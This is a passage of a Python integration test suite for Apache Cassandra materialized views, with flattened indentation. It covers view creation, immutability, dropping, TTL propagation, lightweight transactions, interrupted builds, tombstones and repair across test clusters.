"too low might cause undelivered updates to expire before being replayed.")
# Now let's drop MV
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
# Now we should be able to set the gc_grace_seconds of the base table to 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 0")
# Now we shouldn't be able to create a new MV on this table
assert_invalid(session,
"CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)",
"Cannot create materialized view 'users_by_state' for base table 'users' "
"with gc_grace_seconds of 0, since this value is used to TTL undelivered "
"updates. Setting gc_grace_seconds too low might cause undelivered updates"
" to expire before being replayed.")
def insert_test(self):
"""Test basic insertions"""
session = self.prepare(user_table=True)
self._insert_data(session)
result = list(session.execute("SELECT * FROM users;"))
self.assertEqual(len(result), 4, "Expecting {} users, got {}".format(4, len(result)))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='TX';"))
self.assertEqual(len(result), 2, "Expecting {} users, got {}".format(2, len(result)))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='CA';"))
self.assertEqual(len(result), 1, "Expecting {} users, got {}".format(1, len(result)))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='MA';"))
self.assertEqual(len(result), 0, "Expecting {} users, got {}".format(0, len(result)))
def populate_mv_after_insert_test(self):
"""Test that a view is OK when created with existing data"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
for i in xrange(1000):
session.execute("INSERT INTO t (id, v) VALUES ({v}, {v})".format(v=i))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in xrange(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(i), [i, i])
def crc_check_chance_test(self):
"""Test that crc_check_chance parameter is properly populated after mv creation and update"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id) WITH crc_check_chance = 0.5"))
assert_crc_check_chance_equal(session, "t_by_v", 0.5, view=True)
session.execute("ALTER MATERIALIZED VIEW t_by_v WITH crc_check_chance = 0.3")
assert_crc_check_chance_equal(session, "t_by_v", 0.3, view=True)
def prepared_statement_test(self):
"""Test basic insertions with prepared statement"""
session = self.prepare(user_table=True)
insertPrepared = session.prepare(
"INSERT INTO users (username, password, gender, state, birth_year) VALUES (?, ?, ?, ?, ?);"
)
selectPrepared = session.prepare(
"SELECT state, password, session_token FROM users_by_state WHERE state=?;"
)
# insert data
session.execute(insertPrepared.bind(('user1', 'ch@ngem3a', 'f', 'TX', 1968)))
session.execute(insertPrepared.bind(('user2', 'ch@ngem3b', 'm', 'CA', 1971)))
session.execute(insertPrepared.bind(('user3', 'ch@ngem3c', 'f', 'FL', 1978)))
session.execute(insertPrepared.bind(('user4', 'ch@ngem3d', 'm', 'TX', 1974)))
result = list(session.execute("SELECT * FROM users;"))
self.assertEqual(len(result), 4, "Expecting {} users, got {}".format(4, len(result)))
result = list(session.execute(selectPrepared.bind(['TX'])))
self.assertEqual(len(result), 2, "Expecting {} users, got {}".format(2, len(result)))
result = list(session.execute(selectPrepared.bind(['CA'])))
self.assertEqual(len(result), 1, "Expecting {} users, got {}".format(1, len(result)))
result = list(session.execute(selectPrepared.bind(['MA'])))
self.assertEqual(len(result), 0, "Expecting {} users, got {}".format(0, len(result)))
def immutable_test(self):
"""Test that a materialized view is immutable"""
session = self.prepare(user_table=True)
# cannot insert
assert_invalid(session, "INSERT INTO users_by_state (state, username) VALUES ('TX', 'user1');",
"Cannot directly modify a materialized view")
# cannot update
assert_invalid(session, "UPDATE users_by_state SET session_token='XYZ' WHERE username='user1' AND state = 'TX';",
"Cannot directly modify a materialized view")
# cannot delete a row
assert_invalid(session, "DELETE from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot delete a cell
assert_invalid(session, "DELETE session_token from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot alter a table
assert_invalid(session, "ALTER TABLE users_by_state ADD first_name varchar",
"Cannot use ALTER TABLE on Materialized View")
def drop_mv_test(self):
"""Test that we can drop a view properly"""
session = self.prepare(user_table=True)
# create another materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_birth_year AS "
"SELECT * FROM users WHERE birth_year IS NOT NULL AND "
"username IS NOT NULL PRIMARY KEY (birth_year, username)"))
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(len(result), 2, "Expecting {} materialized view, got {}".format(2, len(result)))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(len(result), 1, "Expecting {} materialized view, got {}".format(1, len(result)))
def drop_column_test(self):
"""Test that we cannot drop a column if it is used by a MV"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(len(result), 1, "Expecting {} materialized view, got {}".format(1, len(result)))
assert_invalid(
session,
"ALTER TABLE ks.users DROP state;",
"Cannot drop column state, depended on by materialized views"
)
def drop_table_test(self):
"""Test that we cannot drop a table without deleting its MVs first"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(
len(result), 1,
"Expecting {} materialized view, got {}".format(1, len(result))
)
assert_invalid(
session,
"DROP TABLE ks.users;",
"Cannot drop table when materialized views still depend on it"
)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(
len(result), 1,
"Expecting {} materialized view, got {}".format(1, len(result))
)
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
session.execute("DROP TABLE ks.users;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(
len(result), 0,
"Expecting {} materialized view, got {}".format(1, len(result))
)
def clustering_column_test(self):
"""Test that we can use clustering columns as primary key for a materialized view"""
session = self.prepare()
session.execute(("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username, state, birth_year));"))
# create a materialized view that use a compound key
session.execute(("CREATE MATERIALIZED VIEW users_by_state_birth_year "
"AS SELECT * FROM users WHERE state IS NOT NULL AND birth_year IS NOT NULL "
"AND username IS NOT NULL PRIMARY KEY (state, birth_year, username)"))
self._insert_data(session)
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX'"))
self.assertEqual(len(result), 2, "Expecting {} users, got {}".format(2, len(result)))
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX' AND birth_year=1968"))
self.assertEqual(len(result), 1, "Expecting {} users, got {}".format(1, len(result)))
def _add_dc_after_mv_test(self, rf):
"""
@jira_ticket CASSANDRA-10978
Add datacenter with configurable replication.
"""
session = self.prepare(rf=rf)
debug("Creating schema")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
debug("Writing 1k to base")
for i in xrange(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
debug("Reading 1k from view")
for i in xrange(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
debug("Reading 1k from base")
for i in xrange(1000):
assert_one(session, "SELECT * FROM t WHERE id = {}".format(i), [i, -i])
debug("Bootstrapping new node in another dc")
node4 = new_node(self.cluster, data_center='dc2')
node4.start(wait_other_notice=True, wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
debug("Bootstrapping new node in another dc")
node5 = new_node(self.cluster, remote_debug_port='1414', data_center='dc2')
node5.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
debug("Verifying data from new node in view")
for i in xrange(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
debug("Inserting 100 into base")
for i in xrange(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
debug("Verify 100 in view")
for i in xrange(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def add_dc_after_mv_simple_replication_test(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with SimpleStrategy.
"""
self._add_dc_after_mv_test(1)
def add_dc_after_mv_network_replication_test(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with NetworkTopologyStrategy.
"""
self._add_dc_after_mv_test({'dc1': 1, 'dc2': 1})
def add_node_after_mv_test(self):
"""
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in xrange(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in xrange(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster)
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in xrange(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
for i in xrange(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in xrange(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def add_write_survey_node_after_mv_test(self):
"""
@jira_ticket CASSANDRA-10621
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node in write survey mode.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in xrange(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in xrange(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster)
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
for i in xrange(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in xrange(1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def allow_filtering_test(self):
"""Test that allow filtering works as usual for a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in xrange(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
for i in xrange(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {v}".format(v=i), [i, i, 'a', 3.0])
rows = list(session.execute("SELECT * FROM t_by_v2 WHERE v2 = 'a'"))
self.assertEqual(len(rows), 1000, "Expected 1000 rows but got {}".format(len(rows)))
assert_invalid(session, "SELECT * FROM t_by_v WHERE v = 1 AND v2 = 'a'")
assert_invalid(session, "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = 1")
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {} AND v3 = 3.0 ALLOW FILTERING".format(i),
[i, i, 'a', 3.0]
)
assert_one(
session,
"SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = {} ALLOW FILTERING".format(i),
['a', i, i, 3.0]
)
def secondary_index_test(self):
"""Test that secondary indexes cannot be created on a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
assert_invalid(session, "CREATE INDEX ON t_by_v (v2)",
"Secondary indexes are not supported on materialized views")
def ttl_test(self):
"""
Test that TTL works as expected for a materialized view
@expected_result The TTL is propagated properly between tables.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 int, v3 int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in xrange(100):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, {v}, {v}) USING TTL 10".format(v=i))
for i in xrange(100):
assert_one(session, "SELECT * FROM t_by_v2 WHERE v2 = {}".format(i), [i, i, i, i])
time.sleep(20)
rows = list(session.execute("SELECT * FROM t_by_v2"))
self.assertEqual(len(rows), 0, "Expected 0 rows but got {}".format(len(rows)))
def query_all_new_column_test(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when adding a new column
@expected_result The new column is present in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'"))
self.assertEqual(len(results), 1)
self.assertTrue(hasattr(results[0], 'first_name'), 'Column "first_name" not found')
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, None, 'f', 'ch@ngem3a', None]
)
def query_new_column_test(self):
"""
Test that a materialized view created with 'SELECT <col1, ...>' works as expected when adding a new column
@expected_result The new column is not present in the view.
"""
session = self.prepare(user_table=True)
session.execute(("CREATE MATERIALIZED VIEW users_by_state2 AS SELECT username FROM users "
"WHERE STATE IS NOT NULL AND USERNAME IS NOT NULL PRIMARY KEY (state, username)"))
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'"))
self.assertEqual(len(results), 1)
self.assertFalse(hasattr(results[0], 'first_name'), 'Column "first_name" found in view')
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
def lwt_test(self):
"""Test that lightweight transaction behave properly with a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
debug("Inserting initial data using IF NOT EXISTS")
for i in xrange(1000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
self._replay_batchlogs()
debug("All rows should have been inserted")
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
debug("Tyring to UpInsert data with a different value using IF NOT EXISTS")
for i in xrange(1000):
v = i * 2
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({id}, {v}, 'a', 3.0) IF NOT EXISTS".format(id=i, v=v)
)
self._replay_batchlogs()
debug("No rows should have changed")
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
debug("Update the 10 first rows with a different value")
for i in xrange(1000):
v = i + 2000
session.execute(
"UPDATE t SET v={v} WHERE id = {id} IF v < 10".format(id=i, v=v)
)
self._replay_batchlogs()
debug("Verify that only the 10 first rows changed.")
results = list(session.execute("SELECT * FROM t_by_v;"))
self.assertEqual(len(results), 1000)
for i in xrange(1000):
v = i + 2000 if i < 10 else i
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(v),
[v, i, 'a', 3.0]
)
debug("Deleting the first 10 rows")
for i in xrange(1000):
v = i + 2000
session.execute(
"DELETE FROM t WHERE id = {id} IF v = {v} ".format(id=i, v=v)
)
self._replay_batchlogs()
debug("Verify that only the 10 first rows have been deleted.")
results = list(session.execute("SELECT * FROM t_by_v;"))
self.assertEqual(len(results), 990)
for i in xrange(10, 1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
def interrupt_build_process_test(self):
"""Test that an interupted MV build process is resumed as it should"""
session = self.prepare(options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
debug("Inserting initial data")
for i in xrange(10000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
debug("Stop the cluster. Interrupt the MV build process.")
self.cluster.stop()
debug("Restart the cluster")
self.cluster.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node1)
session.execute("USE ks")
debug("MV shouldn't be built yet.")
assert_none(session, "SELECT * FROM t_by_v WHERE v=10000;")
debug("Wait and ensure the MV build resumed. Waiting up to 2 minutes.")
start = time.time()
while True:
try:
result = list(session.execute("SELECT count(*) FROM t_by_v;"))
self.assertNotEqual(result[0].count, 10000)
except AssertionError:
debug("MV build process is finished")
break
elapsed = (time.time() - start) / 60
if elapsed > 2:
break
time.sleep(5)
debug("Verify all data")
result = list(session.execute("SELECT count(*) FROM t_by_v;"))
self.assertEqual(result[0].count, 10000)
for i in xrange(10000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
@known_failure(failure_source='test',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-11265',
flaky=True)
def view_tombstone_test(self):
"""
Test that a materialized views properly tombstone
@jira_ticket CASSANDRA-10261
@jira_ticket CASSANDRA-10910
"""
self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.max_trace_wait = 120
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=0, verify
session.execute(SimpleStatement("INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 0",
consistency_level=ConsistencyLevel.ALL))
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'a', 3.0]
)
session.execute(SimpleStatement("INSERT INTO t (id, v2) VALUES (1, 'b') USING TIMESTAMP 1",
consistency_level=ConsistencyLevel.ALL))
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
# change v's value and TS=3, tombstones v=1 and adds v=0 record
session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 3 SET v = 0 WHERE id = 1",
consistency_level=ConsistencyLevel.ALL))
assert_none(session, "SELECT * FROM t_by_v WHERE v = 1")
debug('Shutdown node2')
node2.stop(wait_other_notice=True)
session.execute("UPDATE t USING TIMESTAMP 4 SET v = 1 WHERE id = 1")
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
node2.start(wait_other_notice=True, wait_for_binary_proto=True)
# We should get a digest mismatch
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1",
consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
# We should not get a digest mismatch the second time
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
# Verify values one last time
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0],
cl=ConsistencyLevel.ALL
)
def check_trace_events(self, trace, expect_digest):
# we should see multiple requests get enqueued prior to index scan
# execution happening
# Look for messages like:
# Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey
regex = r"Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey"
for event in trace.events:
desc = event.description
match = re.match(regex, desc)
if match:
if expect_digest:
break
else:
self.fail("Encountered digest mismatch when we shouldn't")
else:
if expect_digest:
self.fail("Didn't find digest mismatch")
def simple_repair_test(self):
"""
Test that a materialized view are consistent after a simple repair.
"""
session = self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
debug('Shutdown node2')
node2.stop(wait_other_notice=True)
for i in xrange(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
debug('Verify the data in the MV with CL=ONE')
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
debug('Verify the data in the MV with CL=ALL. All should be unavailable.')
for i in xrange(1000):
statement = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
assert_unavailable(
session.execute,
statement
)
debug('Start node2, and repair')
node2.start(wait_other_notice=True, wait_for_binary_proto=True)
node1.repair()
debug('Verify the data in the MV with CL=ONE. All should be available now.')
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ONE
)
def base_replica_repair_test(self):
"""
Test that a materialized view are consistent after the repair of the base replica.
"""
self.prepare(rf=3)
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
debug('Write initial data')
for i in xrange(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
debug('Verify the data in the MV with CL=ALL')
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
debug('Shutdown node1')
node1.stop(wait_other_notice=True)
debug('Delete node1 data')
node1.clear(clear_all=True)
debug('Restarting node1')
node1.start(wait_other_notice=True, wait_for_binary_proto=True)
debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
debug('Verify that there is no data on node1')
for i in xrange(1000):
assert_none(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i)
)
debug('Restarting node2 and node3')
node2.start(wait_other_notice=True, wait_for_binary_proto=True)
node3.start(wait_other_notice=True, wait_for_binary_proto=True)
# Just repair the base replica
node1.nodetool("repair ks t")
debug('Verify data with cl=ALL')
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
def complex_repair_test(self):
"""
Test that a materialized view are consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int PRIMARY KEY, v int, v2 text, v3 decimal)"
"WITH gc_grace_seconds = 5")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
debug('Shutdown node2 and node3')
node2.stop()
node3.stop(wait_other_notice=True)
debug('Write initial data to node1 (will be replicated to node4 and node5)')
for i in xrange(1000):
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
debug('Verify the data in the MV on node1 with CL=ONE')
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_other_notice=True, wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
for i in xrange(1000):
assert_none(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i)
)
debug('Write new data in node2 and node3 that overlap those in node1, node4 and node5')
for i in xrange(1000):
# we write i*2 as value, instead of i
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i * 2))
debug('Verify the new data in the MV on node2 with CL=ONE')
for i in xrange(1000):
v = i * 2
assert_one(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0]
)
debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
debug('Start remaining nodes')
node1.start(wait_other_notice=True, wait_for_binary_proto=True)
node4.start(wait_other_notice=True, wait_for_binary_proto=True)
node5.start(wait_other_notice=True, wait_for_binary_proto=True)
session = self.patient_cql_connection(node1)
debug('Read data from MV at QUORUM (old data should be returned)')
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
debug('Run global repair on node1')
node1.repair()
debug('Read data from MV at quorum (new data should be returned after repair)')
for i in xrange(1000):
v = i * 2
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
def really_complex_repair_test(self):
"""
Test that a materialized view are consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int, v int, v2 text, v3 decimal, PRIMARY KEY(id, v, v2))"
"WITH gc_grace_seconds = 1")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL AND v IS NOT NULL AND "
"v2 IS NOT NULL PRIMARY KEY (v2, v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'a', 3.0)")
self._replay_batchlogs()
debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]])
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'b', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'b', 3.0)")
self._replay_batchlogs()
debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'b'", [['b', 1, 1, 3.0], ['b', 2, 2, 3.0]])
session.shutdown()
debug('Shutdown node1, node4 and node5')
node1.stop()
